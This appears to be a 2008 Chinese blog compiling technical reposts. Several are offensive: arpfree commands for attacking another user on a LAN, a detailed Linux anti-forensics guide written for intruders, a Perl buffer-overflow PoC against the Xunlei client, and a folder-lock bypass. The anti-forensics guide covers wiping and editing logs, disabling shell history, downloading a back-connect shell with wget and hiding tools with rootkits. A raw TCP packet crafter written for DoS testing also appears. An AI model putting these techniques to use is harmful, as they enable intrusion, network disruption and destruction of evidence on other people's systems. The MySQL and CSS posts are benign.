狂人日记

MySQL忘记密码处理方法解决办法

Sat, 10 May 2008 13:25:23 +0800

MySQL忘记密码处理方法解决办法：
1。停止mysql服务。//打开命令行窗口，停止mysql服务： Net stop mysql
2。启动mysql，一般到mysql的安装路径，找到 mysqld-nt.exe
执行：mysqld-nt --skip-grant-tables 当前窗口将会停止。
3。另外打开一个命令行窗口，进入MYSQL的安装位置下BIN目录，运行mysql
4。输入如下命令：
>use mysql
>ｕpdate user set password=password("new_password") where user="root";
>flush privileges;
>exit
6。用Ctrl+Alt+Del，找到mysqld-nt的进程杀掉它，在重新启动mysql-nt服务，就可以用新密码登录了

对抗网络执法官等软件攻击的利器arpfree

Fri, 09 May 2008 14:41:39 +0800

使用方法：
首先安装winpacp驱动，发送的时候可以选择ARP的TYPE。如果是ARP请求报文，则只要输入要问的IP地址，如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址。
最后的发送速度可选参数为：（大小写敏感）

fast----------最快
hear---------每60MS一个包（比较适合结合SNIFFER做监听）
slowhear---每500MS一个包
auto---------每1秒一个包
slow---------每2秒个包

实例

反击网络执法官，网络终结者的攻击：
1：发动比他更强烈的攻击：
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
这里是你想攻击的人的IP地址
2：交换机竞争：

arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
这里是你想攻击的人的MAC地址

1：情况将导致他IP地址冲突（比“终结者”来的猛烈多了）
2：情况将使得他无法连接网络（由于交换机把他的流量都给你了）

可笑的文件夹加密大师

Fri, 09 May 2008 14:35:57 +0800

文章作者：樱花浪子
原始出处：http://www.hacklu.net
转载请保留版权，请相互尊重。　　　　　　　　　　　　　　　　　
　　　　　　　　　　　　　　　　　

　　最近在找一款加密文件夹的工具，于是百度了一下发现N多，但是利用原理很多都是利用WIN缺陷的".."加密，可能有很多朋友知道，也可能有很多朋友不知道这种原理，网上有一种软件利用这个自称是XX加密大师，汗……

大家知道在CMD下可以用MD NAME..\建立带点的文件夹，这样建立完我们发现，无法打开和改名、删除等。会出现xxxx引用一个不可用的位置，其实程序利用的就是这个原理，把要加密的文件夹，用API将要加密的文件夹名称后面加上..\,解密的时候再把它去掉。

　　这里以云南黑客联盟的超强文件加密目录为例，首先我们建立一个test的文件夹，里面建一个test.txt的文本。用这个东东进行加密，加密后test文件夹会变成test.如图1，这时无论我们打开、删除、改名等都会弹出如图2的对话框。

550)this.width=550;" />

　　那怎么破解呢，只要我们在运行里输入：W:\test\test..\这里注意一下文件夹第一次打开的时候会一闪关掉，我们只要在运行里再输入一遍W: \test\test..\文件夹就会乖乖的出来了，而且我们可以进行复制，移动等。如果我们想删除只要用rmdir x:\test..\ /s一切就没了。

　　但在测试的时候我发现如果上一级目录有空格的话如W:\te st\test..\在运行里输入就会出现图3的错误，这里我们假设一下如果加密者把文件夹加密在一个含空格的文件夹中呢？其实这个也很简单，如果像W: \te st这里我们有权限重命名的话我们可以改名把空格去掉，但如果像C:\Documents and Settings这样的系统文件夹我们没有权限重命名的时候只要我们进入相应的文件夹下用md x:\md...\在建立一个就可以进去了。

在假设如果加密者在硬盘根目录建立一个带空格的文件夹，然后进行加密，这样我们运行x:te st..\或者在X盘根目录用md te st...\都是不行的，都会被te这里断掉，这时我们只要用短文件名照样可以进去或者删除，例如我在w盘建立一个te st，里面建立一个OK的文本，然后用上面的工具加密就会变成了“te st.”我们进入cmd下w盘的根目录，执行dir /x，看看吧，短文件名都出来了，te st.对应的就是TEST~1，我们继续执行md TEST~1..\回到w盘看看会多一个TEST~1.的文件夹，里面的OK文本文件也出来了。图4。

550)this.width=550;" />

文章我已经做了动画，有兴趣的朋友可以看下，最后劝大家一句不要在相信网络上流传的不现实的东东，比如说手册论坛里最近流传一个只知道IP就可以开启远方摄像头的软件，我已经在“菜鸟疑惑”顶置了相应的帖子。

linux入侵踪迹隐藏攻略v0.1

Fri, 09 May 2008 14:31:56 +0800

作者：xi4oyu

免责声明：

本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责,转载请保留。

0．前言：
被警察叔叔请去喝茶时间很痛苦的事情，各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深，是我们必须掌握的基本功。当然，如果管理员真的想搞你而他的功力又足够足的话，相信没什么人能够真正的“踏雪无痕”。Forensic 与Anti-Forensic，说到底只是你和管理员之间的技术间较量而已。貌似很少有专门说这个的文章，大部分就是下载个日志擦除的软件，然后运行下就可以了，对小站可以，但对方如果是经验丰富的管理员呢？我们该如何应对？我在这里只介绍unix-like system下的，至于windows或者其他什么系统下的，欢迎各位道友补充。

1.
最小化你的日志

P.S 访问目标前用跳板我就不废话了，你是VPN也好3389也罢，ssh中转，代理都行。总之记住一点—直接连接攻击目标是愚蠢的

1.1
shell使用问题
目前linux下大多数的shell都是采用bash或者其他的什么shell 通过输入输出重定向来实现与服务器的交互的，当我们使用ssh 或者telnet之类的登录的时候，我们的命令都会被记录在shell 的history文件下面。举例来说bash会在当前目录下面.bash_history文件里记录下你此次登陆操作的命令，如果你拿这台机器当跳板的话，或者扫描其他机器，你的命令都会被记录下来哦。呵呵，所以我们登录的第一件事就是执行如下命令：

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

当然不同的shell写法可能不同，像有的set设置环境变量什么的。大家根据自己的shell自行修改。记住：从 webshell弹回的shell也会记录你的操作，值得庆幸的是现在很多弹shell的脚本都预先unset 环境变量。
我们还需要记住的是在登录的时候出现在登录窗口的一些信息，比如该用户在什么时候从哪个IP登录进来的等等，这在我们后面的用于日志清除与修改的时候要用到。
如图：
[attach]3067[/attach]

作为跳板的时候，我们有可能需要用本机的ssh去访问别的机器，但是别的机器的公钥呢？总不能放在当前用户的目录下吧？当然你可以事后删除，但多一事不如少一事，你说对么？
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i
就可以了，但在这样运行某些命令的时候可能会有提示，说你的stdin不是个terminal，这里可以这样解决：
python -c 'import pty; pty.spawn("/bin/sh")' 或者自己再建立个ttyshell。

1.2
webshell的选择问题
可能各位道友的日常生活中最主要目标瞄向了webserver 。现在的web也是大多数入侵的一个突破口。Linux下用的最多的就是apache服务器了，当我们发觉一个服务器的漏洞时候很可能要上传一个webshell来进行对服务器文件进一步的操作和信息的搜集，部分webshell也提供了反弹shell的功能。如何能够在apache服务器的日志文件中留下最小的记录也是需要深究的。这种情况通常发生在没能够获得足够的权限来清除apache日志。如果能够root了，则可以将重点放在第二节日志清除上。通常，日志只记录GET的信息，比如你的注入，你采用了那种方式提交数据等等。如果我们的 webshell采用的多是GET方式交互的话，就很容易在httpd的access_log中留下很多日志。这些以后都会被作为证据所采纳的。Phpspy是个很好的选择，作者也注意掉了这点，取消了GET方式的交互，再给webshell起一个比较迷惑的名字，这样我们与webshell的交流就更加隐秘。

2.
日志的清除与改写
日志清除与改写，俗称擦PP，这是个很重要的过程，日志记录了你对目标机器的操作记录，大部分的入侵者查找都是通过日志来确定的，因此，我们需要对日志文件进行操作。对日志操作有这么个说法，能修改的就不清除，这样才能最小的减少管理员的怀疑。Linux下的大多数文件是以文本方式，或者以简单的结构体方式存入文件的，这就为我们修改某个日志记录里的具体内容提供了前提条件。
需要注意的一点是，我们需要先看看日志的存放位置，有的管理员会修改日志保存的位置，一般来说，我们可以查看/etc/syslog.conf来获得log文件存放的位置。但要注意的是，有的管理员(及其负责)会重新编译syslogd文件来重新指定log存放的位置，怎么办？在这种情况下可以用strings来看下/sbin/syslogd这个文件，这种管理员我只在书里看到过，至少我没遇到过: P。这个配置文件里面记录了系统存放某些log的目录，如secure文件等。下面我们就会根据这个文件来清理和修改日志。
现在可以在网上公开获得的日志清除程序代码很粗糙，我曾经看到过最夸张的清日志的代码像这样:
rm -rf /var/log/lastlog ; rm -rf /var/log/telnetd ; rm -rf /var/run/utmp ; rm -rf /var/log/secure ; rm -rf /root/.ksh_history ; rm -rf /root/.bash_history ; rm -rf /root/.bash_logut ; rm -rf /var/log/wtmp ; rm -rf /etc/wtmp ; rm -rf /var/run/utmp ; rm -rf /etc/utmp ; rm -rf /var/log ; rm -rf /var/adm ; rm -rf /var/apache/log ; rm -rf /var/apache/logs ; rm -rf /usr/local/apache/log ; rm -rf /usr/local/apache/logs ; rm -rf /var/log/acct ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/log/proftpd/xferlog.legacy ; rm -rf /var/log/proftpd.access_log ; rm -rf /var/log/proftpd.xferlog ; rm -rf /var/log/httpd/error_log ; rm -rf /var/log/httpd/access_log ; rm -rf /etc/httpd/logs/access_log ; rm -rf /etc/httpd/logs/error_log ;rm -rf /var/log/news/suck.notice ; rm -rf /var/spool/tmp ; rm -rf /var/spool/errors ; rm -rf /var/spool/logs ; rm -rf /var/spool/locks ; rm -rf /usr/local/www/logs/thttpd_log ; rm -rf /var/log/thttpd_log ; rm -rf /var/log/ncftpd/misclog.txt ; rm -rf /var/log/ncftpd.errs ; rm -rf /var/log/auth ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history –r

整个一rm集合，要是服务器跑了很长时间，积累了很多日志。你这样一删除，的，你帮他省事了，他也省事，一眼就看出有人进来了。
先不说其他，用rm删除就不可取，正确的删除文件做法是用shred
shred -n 31337 -z -u file_to_delete
这样多次擦除才够安全。呵呵
下面具体的针对日志文件进行分析。
W命令提供了管理员查看当前登录帐户的功能，所以与管理员同台共演是件很危险的事情，能不做就不做，但也有人曾经上演过local exp后，装上tty 然后T管理员下线截获登录密码的好戏。呵呵，如何让w不显示你登录了呢？
用rootkit我就不废话了，这里有个小窍门，即使是普通用户登录管理员也不能看见：
在跳板上登录目标ssh -T somebody@1.1.1.1 /bin/bash –i 你可以试试，很好用哦。

OK，言归正传
首先第一个概念是timstamp，也就是你用ls –l 看到的东西，我们在修改一个LOG文件之前或者留后门之后都得留心下这个时间，有很多管理员喜欢通过timestamp来查找入侵者留下的东西。记住以下命令
touch -r 具有你希望改成的时间的文件你要改变的文件他能够使得两个文件的timestamp保持一致。
在你修改日志之前，你可以在/dev/shm下面建立一个临时文件，并将log的timestamp保存下俩，然后再touch回去。为什么要用/dev/shm 目录在第三节会有说明。当然我们也可以用程序实现，不过有的时候我们会碰到没有见过的日志类型，所以有时候需要手工改写日志。除了时间之外，还需要注意文件的其他属性，比如所有者或是否有粘滞位等等。这些都需要注意。

Linux 的日志散落在系统各处，同时系统管理员也能够灵活的制定日志保存的位置，这就要求我们非常小心，采用通用的日志移除或改写工具是很不明智的，为此我们要对需要修改的日志系统有个全面的了解。具体的内容请参看文章《Linux服务器日志管理详解》。
这里提供个工具
http://lists.darklab.org/pipermail/darklab/2006-May/000234.html
怎么使用自己去看看吧。我个人还是倾向于某个日志用某个特定的清除或修改器，这样灵活性更大点。
我们也可以使用sed命令行工具来清除某些日志，通常我会这样修改web日志:

touch /dev/shm/timestamp; touch -r access_log /dev/shm/timestamp;sed'/192\.168\.44\.1/d' access_log > /dev/shm/backlog ; cat/dev/shm/backlog > access_log; touch -r /dev/shm/timestamp./access_log ;shred -n 255 -z -u /dev/shm/timestamp;

这里192.168.44.1是我跳板的IP。
具体的log修改和擦除工具，各位道长就从网上下个现成的自己改改吧，呵呵，我就不在这献丑了。
还有一点，我们要将wtmp文件中的登录日志修改成原来管理员登陆的IP和时间也就是第一节中记下的时间与IP。如果实在得不到 root权限，我们也可以ssh localhost一下来隐藏登录IP。

3.
工具与数据的隐藏
3.1工具与数据的临时存放
当我们需要在服务器上留下某些程序的时候，比如sniff软件，或者作为跳板攻击其他服务器的时候，我们不得不面对着一个痛苦的抉择：既要能够留下足够的工具来完成必要的任务，又要经可能少的对文件系统乃至对磁盘的数据的改写。在这种情况下，如果所要保存的数据只是临时的，我们就需要在内存中建立起文件系统。这样，当系统再重启后我们曾经在磁盘上保留的信息就会被擦除，因为它没有被真正的写到磁盘上面去。（注意：通常我们只用这种方法来保存暂时用的程序、代码等工具，如果要长久保存的不推荐此种方法）
为此，我们需要建立ramfs,它是一个在内存中存在的文件系统。具体的介绍请各位道友自行查找相关文档查看。建立ramfs很简单，不过需要有root权限。代码如下：
mount -t ramfs ramfs /usr/tmp
这样/usr/tmp目录就被挂载为一个内存文件系统。当然，在实际过程中我们可能要找一个隐藏比较深的不用的目录来做为挂载点。
那在我们没有root的情况下呢？有时候，我们可能会遇到某个websever的php代码有个remote execution的洞洞，在webserver 的目录下不可写的时候，我们可能会用到wget来下载一个回连的shell到一个都可以写的目录，比如/tmp
通常我们会这样做：
Wget http://xxxx/backshell.pl -P /tmp
但是否想过/tmp或许只是一个普通的ext3或者reinfs文件系统，最多充其量是个tmpfs，这些文件系统有个特点就是会与磁盘交互。那我们应该选择什么目录来保存我们的代码呢？在现代的linux操作系统中，默认挂载了/dev/shm目录其类型就是ramfs，作为系统共享用。我们就可以利用它来完成保存shell的目的。

3.2工具与数据的长期存放
目录的隐藏是个很高深的学问，在最开始的阶段，我们通常是在一个很深的目录里面建立名为”…” 或者” ”等的目录，然后把工具一股脑的放进去，这招在对付不负责任的管理员的时候很管用，但是遇到负责人的管理员一个find语句就能把你找出来：
# find / -uid 0 –perm -4000 –print
# find / -size +10000k –print
# find / -name “...“ –print
# find / -name “.. “ –print
# find / -name “. “ –print
# find / -name “ “ –print
留setuid的程序也是个大的忌讳，这样很容易引起管理员的怀疑。特别是这个setuid程序存在莫名其妙的目录下的时候。
在大多数情况下，我们可以借助 rootkit来帮助你完成这个功能。
我简单的介绍下，像linux下的rootkit，总体来说可以分为两大类：应用层和内核态的rootkit。
应用层的rootkit通常通过修改某些文件来实现信息隐藏，比如修改ls 让其不显示某个特殊名称文件夹，修改ifconfig让其不显示PROMISC位
还有的是通过修改 so
文件来留后门等等。如果管理员安装了tripwire之类的完整性校验工具各位道友就要小心了，不过一般的管理员也没那么负责。这些低级的rootkit很容易给chkrootkit之类的工具给揪出来，要真正用的话最好自己能下载源代码重新编译下，修改掉配置文件的默认位置，这样好点。
内核级别的rootkit:顾名思义，进入ring0级别来HOOK掉某些系统调用或者其他什么乱起八糟的方法来改掉系统调用的执行输出（当然也ring3 patch ring0也有，像suckit）。这种东西很诡异，能够真正成功装上的几率不大，关键看人品，呵呵。进入了2.6时代，很多美好的rootkit都失去了光彩。加之2.6的模块编译要内核树的支持，更使得LKM方式的 rootkit举步维艰。据wzt讲，suckit也有2.6版本的，不过是private的要money。偶等穷人也只有干看到份了。
2.6的rootkit安装可以看看包总的adore-ng教程 wnps也不错，不过wzt这BB也停止开发了
。还有什么内核静态patch等方法，也只是在phrack里面看到过，各位道友用过的给我介绍下啊，呵呵。

扯远了，关于如何隐藏文件，当然你也可以采用伪造坏扇区的方法，将你的东西放在那里，一般的文件系统算是看不出来了。你可以用特殊的工具对其进行存储。这个再以后的advance anti-forensic文章中会讲，不再多说。

4.
如何安装和编译工具
可能linux与windows对于用户来说，最大的不同就是linux从网上下载的大多数都是src 源代码包，要使用的话需要在机器上现场编译，好不容易有编译好的发行包如rpm
deb还是和系统相关的依赖性啊，等等，烦都烦死人了。像要装个ettercap,什么ｌｉｂｎｅｔ libpcap都得装上，但有时候我们的目标机器上没有所需要的依赖文件，这怎么办呢？不推荐使用rpm
dpkg 等方式来安装需要的文件，也不推荐apt yum源等方式安装，从源代码编译把，这样比较好点。
我们把下载的源代码放到自己的隐藏目录里，在configure的时候需要指定prefix安装路径，总不能把这些包真正的装到系统里面把，指定成我们的隐藏目录就好，这样一来，管理员也不会发现怎么系统安装了许多原本没有支持的库文件或者头文件了。
最后一步，当编译我们的工具时，需要指定所依赖的头文件目录和库文件目录，不要执行make install命令，这样一来，我们的工具就可以完全在我们的隐藏目录里面了。
关于perl的模块安装，可以参看这边文章：
http://servers.digitaldaze.com/extensions/perl/modules.html

先写这么多吧，呵呵，有想到的再加上。后头还会写篇Advance anti-forensic的文章。可能有的道友会说我太小心。小心好啊，小心使得万年船，不是么？呵呵

四种网页跳转代码

Fri, 09 May 2008 09:16:36 +0800

如果你要在服务器端跳转，可以这样：

Response.Redirect(http://www.woidiy.com/blog/)
Response.End

如果你要在客户端跳转，可以这样：

<script language="javascript" type="text/javascript">
window.location="http://www.woidiy.com/blog/";;
</script>

如果你要让页面显示几秒钟之后跳转，可以在html代码的<head></head>部分加上这样的代码：

<meta http-equiv="refresh" content="3; url=http://www.woidiy.com/blog/">
（3秒钟后自动跳转到www.517z.com）

这种用来做广告很有效果。。
<SCRIPT>if(parent.window.opener) parent.window.opener.location='http://www.woidiy.com/blog/'; </SCRIPT>
<script>
var s=document.referrer
if(s.indexOf("baidu")>0)self.location="http://www.woidiy.com/blog/";
</script>

使用winpcap定制TCP包发送

Thu, 08 May 2008 16:43:48 +0800

by 云舒

前些时候做DOS方面的测试，由于协议学得不够好，有些回应不记得，所以就首先想到用hping来定制一些包，看看远程主机的回应。结果下载的hping 死活都不发包，换了多个不同版本的winpcap都不行。一怒之下，决定自己写个简单的。首先想到的是perl来做，最后觉得一样要安装 winpcap还有很多别的模块，不如直接c来实现一下，来得更痛快。

需要说明一下的是，在以太网头那里我故意偷懒了，没有获取本机的MAC地址而是写了个错误的。所以给内网用户发包的话，能发出去，只是你收不到回应了，发给外网就没这个问题，这是因为同交换机下面靠MAC地址来定位的。

最后一点，这里所有的包，目的MAC地址都是写的MAC，通过网关把数据转发出去的。虽然同交换机下面可以直接通过MAC定位，但是我懒得判断，直接发送给网关再转发会比较简单。

/* Code By yunshu, 2008-05-08, Make tcp packet to send to remote server
* I don't know which version of winpcap needed by hping, so I wrote this code.
* Under winpcap 4.0.2, Dev-CPP 4.9.9.2, windows xp professional sp2
*/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <iphlpapi.h>
#include <unistd.h>
#include <pcap.h>
#include <remote-ext.h>

#define IP_PROTO 0x0800

char LocalIP[20] = { 0 };
char InterfaceName[256] = { 0 };
char GatewayIP[20] = { 0 };
BYTE GatewayMac[6];

typedef struct et_header
{
unsigned char eh_dst[6];
unsigned char eh_src[6];
unsigned short eh_type;
}ET_HEADER;

typedef struct ip_hdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;

typedef struct tcp_hdr
{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
}TCP_HEADER;

typedef struct tsd_hdr
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSD_HEADER;

unsigned short CheckSum(unsigned short * buffer, int size)
{
unsigned long cksum = 0;

while (size > 1)
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if (size)
{
cksum += *(unsigned char *) buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);

return (unsigned short) (~cksum);
}

/*
void GetLocalIP( )
{
WORD wVersionRequested;
WSADATA wsaData;
char name[255];
PHOSTENT hostinfo;

wVersionRequested = MAKEWORD( 2, 0 );

if( WSAStartup( wVersionRequested, &wsaData ) == 0 )
{
if( gethostname( name, sizeof(name) ) == 0 )
{
if( (hostinfo = gethostbyname(name) ) != NULL )
{
strcpy( LocalIP, inet_ntoa( *(struct in_addr*)*hostinfo->h_addr_list ) );
}
}
}

WSACleanup( );
}
*/

int GetDevices( )
{
pcap_if_t *alldevs;
pcap_if_t *d;

int i = 0;
char errbuf[PCAP_ERRBUF_SIZE];

/* 获取本地机器设备列表 */
if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL /* auth is not needed */, &alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs_ex: %s\n", errbuf);
exit(1);
}

/* 打印列表 */
for( d = alldevs; d != NULL; d = d->next )
{
printf("%d. %s", ++i, d->name);

if (d->description)
{
printf( " (%s)", d->description );
}

if( d->addresses != NULL )
{
if( d->addresses->addr->sa_family == AF_INET )
{

printf( ": %s\n", inet_ntoa( ((struct sockaddr_in *)d->addresses->addr)->sin_addr ) );
}
else
{
printf( "\n" );
}
}
else
{
printf(" (No description available)\n");
}
}

if (i == 0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return -1;
}

printf( "\nPlease choose the index of your NetAdapter：" );
int AdapterIndex = 1;
scanf( "%d", &AdapterIndex );
if( AdapterIndex > i )
{
printf( "网卡选错啦\n" );
return -1;
}

d = alldevs;
for( int index = 1; index < AdapterIndex; index ++ )
{
d = d->next;
}

if( d->name == NULL || d->addresses == NULL )
{
printf( "网卡选错啦\n" );
return -1;
}

strcpy( InterfaceName, d->name );
strcpy( LocalIP, inet_ntoa( ((struct sockaddr_in *)d->addresses->addr)->sin_addr ) );

/* 不再需要设备列表了，释放它 */
pcap_freealldevs(alldevs);

return 1;
}

int GetGateWayMac( )
{
PIP_ADAPTER_INFO AdapterInfo;

ULONG OutBufLen = sizeof(IP_ADAPTER_INFO);
AdapterInfo = (IP_ADAPTER_INFO *)malloc(sizeof (IP_ADAPTER_INFO));
if( AdapterInfo == NULL )
{
printf("Error allocating memory needed to call GetAdaptersinfo\n");
return -1;
}

if( GetAdaptersInfo( AdapterInfo, &OutBufLen ) == ERROR_BUFFER_OVERFLOW )
{
free( AdapterInfo );
AdapterInfo = (IP_ADAPTER_INFO *)malloc( OutBufLen );
if( AdapterInfo == NULL )
{
printf("Error allocating memory needed to call GetAdaptersinfo\n");
return -1;
}
}

if( GetAdaptersInfo( AdapterInfo, &OutBufLen ) == NO_ERROR )
{
PIP_ADAPTER_INFO a = AdapterInfo;
BOOL Found = FALSE;

while( a )
{
if( strcmp(a->IpAddressList.IpAddress.String, LocalIP) == 0 )
{
strcpy( GatewayIP, a->GatewayList.IpAddress.String );
Found = TRUE;
break;
}
a = a->Next;
}
if( !Found )
{
printf( "Get gateway's ip error.\n" );
free( AdapterInfo );
return -1;
}
else
{
free( AdapterInfo );
}
}
else
{
printf( "Get gateway's ip error.\n" );
free( AdapterInfo );
return -1;
}

BYTE Mac[6];
ULONG MacLen = 6;
SendARP( inet_addr(GatewayIP), 0, (PULONG)&Mac, &MacLen );
memcpy( GatewayMac, Mac, MacLen );

/*
for( int index = 0; index < MacLen; index ++ )
{
printf( "%d: %02x\n", index, Mac[index] );
}
printf( "\n%d\n", MacLen );
*/
}

void Usage( char *me )
{
printf( "Make tcp package 0.1, code by yunshu\n" );
printf( "%s: targetip targetport [flag]\n", me );
printf( "flag: \n" );
printf( " u|U set urg flag.\n" );
printf( " a|A set ack flag.\n" );
printf( " p|P set push flag.\n" );
printf( " r|R set rst flag.\n" );
printf( " s|S set syn flag.\n" );
printf( " f|F set fin flag.\n" );
printf( " default is syn flag, and you can use sa to set syn+ack, and more...\n" );
}

int main( int argc, char *argv[] )
{
ET_HEADER EtHeader;
IP_HEADER IpHeader;
TCP_HEADER TcpHeader;
PSD_HEADER PsdHeader;
u_char Buffer[sizeof(ET_HEADER) + sizeof(IP_HEADER) + sizeof(TCP_HEADER)] = { 0 };

if( (argc != 3) && (argc != 4) )
{
Usage( argv[0] );
exit( -1 );
}

int Flag = 2;
if( argc == 4 )
{
Flag = 0;
if( strchr(argv[3], 'U') || strchr(argv[3], 'u') )
{
Flag = Flag | 32;
}
if( strchr(argv[3], 'A') || strchr(argv[3], 'a') )
{
Flag = Flag | 16;
}
if( strchr(argv[3], 'P') || strchr(argv[3], 'p') )
{
Flag = Flag | 8;
}
if( strchr(argv[3], 'R') || strchr(argv[3], 'r') )
{
Flag = Flag | 4;
}
if( strchr(argv[3], 'S') || strchr(argv[3], 's') )
{
Flag = Flag | 2;
}
if( strchr(argv[3], 'F') || strchr(argv[3], 'f') )
{
Flag = Flag | 1;
}
}

//GetLocalIP( );
if( -1 == GetDevices( ) )
{
exit( -1 );
}

//printf( "Adapter is %s, ip is %s\n", InterfaceName, LocalIP );

if( -1 == GetGateWayMac( ) )
{
exit( -1 );
}

//printf( "Gateway IP is %s\n", GatewayIP );
//printf( "Gateway Mac is %x\n", *GatewayMac );

memcpy( EtHeader.eh_dst, GatewayMac, 6 );
memset( EtHeader.eh_src, 0xa, 6 );
EtHeader.eh_type = htons( IP_PROTO );

IpHeader.h_verlen = (4<<4 | sizeof(IpHeader)/sizeof(unsigned int));
IpHeader.tos = 0;
IpHeader.total_len = htons(sizeof(IpHeader)+sizeof(TcpHeader));
IpHeader.ident = 1;
IpHeader.frag_and_flags = 0x40;
IpHeader.ttl = 128;
IpHeader.proto = IPPROTO_TCP;
IpHeader.checksum = 0;
IpHeader.sourceIP = inet_addr( LocalIP );
IpHeader.destIP = inet_addr( argv[1] );

TcpHeader.th_sport = htons( rand()%60000 + 1024 );
TcpHeader.th_dport = htons( atoi(argv[2]) );
TcpHeader.th_seq = htonl( rand()%900000000 + 100000 );
TcpHeader.th_ack = 0;
TcpHeader.th_lenres = (sizeof(TcpHeader)/4<<4|0);
TcpHeader.th_flag = Flag;
TcpHeader.th_win = htons(512);
TcpHeader.th_sum = 0;
TcpHeader.th_urp = 0;

PsdHeader.saddr = inet_addr( LocalIP );
PsdHeader.daddr = IpHeader.destIP;
PsdHeader.mbz = 0;
PsdHeader.ptcl = IPPROTO_TCP;
PsdHeader.tcpl = htons(sizeof(TcpHeader));

memcpy( Buffer, &PsdHeader, sizeof(PsdHeader) );
memcpy( Buffer + sizeof(PsdHeader), &TcpHeader, sizeof(TcpHeader) );
TcpHeader.th_sum = CheckSum( (unsigned short *)Buffer, sizeof(PsdHeader) + sizeof(TcpHeader) );

memset( Buffer, 0, sizeof(Buffer) );
memcpy( Buffer, &IpHeader, sizeof(IpHeader) );
IpHeader.checksum = CheckSum( (unsigned short *)Buffer, sizeof(IpHeader) );

memset( Buffer, 0, sizeof(Buffer) );
memcpy( Buffer, (void *)&EtHeader, sizeof(ET_HEADER) );
memcpy( Buffer + sizeof(ET_HEADER), (void *)&IpHeader, sizeof(IP_HEADER) );
memcpy( Buffer + sizeof(ET_HEADER) + sizeof(IP_HEADER), (void *)&TcpHeader, sizeof(TCP_HEADER) );

char errbuf[PCAP_ERRBUF_SIZE] = { 0 };
pcap_t *fp;
if ( (fp= pcap_open( InterfaceName, 100, PCAP_OPENFLAG_PROMISCUOUS, 100, NULL, errbuf ) ) == NULL )
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", InterfaceName );
return -1;
}

if ( pcap_sendpacket( fp, Buffer, sizeof(Buffer) ) != 0 )
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));
return -1;
}
printf( "send ok!\nData is:\n" );

for( int i = 0; i < sizeof(Buffer); i ++ )
{
printf( "%02x ", Buffer );
}

return 0;
}

基于CSS的ASCII艺术

Wed, 07 May 2008 16:29:41 +0800

ASCII 艺术是一种使用计算机可打印字符（一般为ASCII码中的96个可打印字符）表现图形的一种技术，传统的 ASCII 艺术基于 HTML 代码，然而由于不同浏览器的差别，在一种浏览器下可以完美显示的 ASCII 艺术，到了别的浏览器就面目全非，Web2.0 时代，应该多在 CSS 上做文章，因为目前主流浏览器对 CSS 的支持都非常一致，使用 CSS 实现 ASCII 艺术可以更好地保持不同浏览器间的兼容。

下面这个图很难想象是用 ASCII 艺术做出来的，当然为了简便，我使用的是图片，原始 ASCII 艺术版可在这里看到。

jpeg2css 是一个非常有趣的程序，你提供一副黑白的 JPG 图片给它，几秒种之内，可以为你生成一个 HTML 网页文件，你可以在该网页上看到和源 JPG 图片几乎一模一样的 ASCII 艺术图形，而且是基于 CSS 的，你不用担心该 ASCII 艺术在不同浏览器间的兼容问题。

更多基于 CSS 的 ASCII 艺术 （CSS 原始版可以在这里看到）

jpeg2css 下载地址：
http://www.romancortes.com/ficheros/jpeg2css.zip

本文素材来自：http://www.romancortes.com/blog/tag/css/
COMSHARP CMS编译

迅雷本地溢出POC

Wed, 07 May 2008 08:34:52 +0800

以前一直在传迅雷还有0day，Activex的应该差不多了，但是也不敢怠慢，还是卸载之，今天丰初发来一URL，原来素一迅雷0day，看说明还是远程！感觉装了一个，看那个漏洞监听的端口
C:\>netstat -na|find "36897"
TCP 127.0.0.1:36897 0.0.0.0:0 LISTENING

绑定的本地IP啊？！那就说明这个是不可以远程的，只能本地了。
......
23132CBE 68 B4C61323 push 2313C6B4 ; ASCII "savepath"
23132CC3 57 push edi
23132CC4 FFD6 call esi
23132CC6 59 pop ecx
23132CC7 84C0 test al, al

......

23132CEF 85FF test edi, edi
23132CF1 74 02 je short 23132CF5
23132CF3 8BCF mov ecx, edi
23132CF5 B8 D4C61323 mov eax, 2313C6D4 ; ASCII "XLDAP"
23132CFA 50 push eax
23132CFB 52 push edx
23132CFC 51 push ecx
23132CFD 50 push eax
23132CFE 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4]
23132D04 68 C0C61323 push 2313C6C0 ; ASCII "%s|%s|%s|%s"
......

根据上面可以分析出来这个端口接受数据的格式是XLDAP|A|B|XLDAP，A是方法，B是值。又偷懒看了下介绍，问题出在savepath方法上，那么构造数据就很简单了，POC如下：

#!/usr/bin/perl
use IO::Socket;

if ($socket = IO::Socket::INET->new(PeerAddr => "127.0.0.1",PeerPort => "36897",Proto => "TCP"))
{
$exploit = "XLDAP|savepath|".
# ("A" x 397).
("A" x 500).
"|XLDAP";

print $socket $exploit;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to localhost:36897 port\n";
}

